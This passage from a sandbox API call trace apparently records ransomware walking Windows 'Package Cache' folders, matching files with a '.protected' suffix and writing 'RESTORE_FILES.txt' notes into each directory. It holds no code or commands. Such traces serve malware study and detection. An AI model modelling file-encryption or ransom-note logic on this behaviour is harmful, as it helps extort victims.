cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.370] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.370] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package 
cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.371] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.371] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.371] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.371] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.371] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.372] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.372] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 86 [0093.372] lstrcmpW 
(lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0093.372] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned 88 [0093.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\.") returned 88 [0093.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\..") returned 89 [0093.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 95 [0093.373] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.373] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned 97 [0093.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\.") returned 97 [0093.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\..") returned 98 [0093.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.373] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.374] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 119 [0093.374] lstrcmpW (lpString1="vcRuntimeAdditional_x86", 
lpString2=".") returned 1 [0093.374] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned 121 [0093.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\.") returned 121 [0093.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\..") returned 122 [0093.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 138 [0093.374] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW 
(in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 137 [0093.374] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.374] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 158 [0093.374] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.374] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 137 [0093.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.375] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) 
returned 0 [0093.375] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.375] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.375] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.375] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.375] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.375] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.376] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.376] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.376] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.376] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.376] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 86 [0093.376] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0093.376] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned 88 [0093.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\.") returned 88 [0093.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.377] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\..") returned 89 [0093.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.377] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.377] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 95 [0093.377] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.377] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.377] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned 97 [0093.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\.") returned 97 [0093.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\..") returned 98 [0093.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.378] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.378] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 116 [0093.378] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned 118 [0093.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\.") returned 118 [0093.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\..") returned 119 [0093.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 135 [0093.379] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.379] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.379] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 152 [0093.379] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.379] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.379] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.379] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.380] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.380] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.380] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.381] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.381] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 75 [0093.381] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0093.381] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned 77 [0093.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\.") returned 77 [0093.381] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
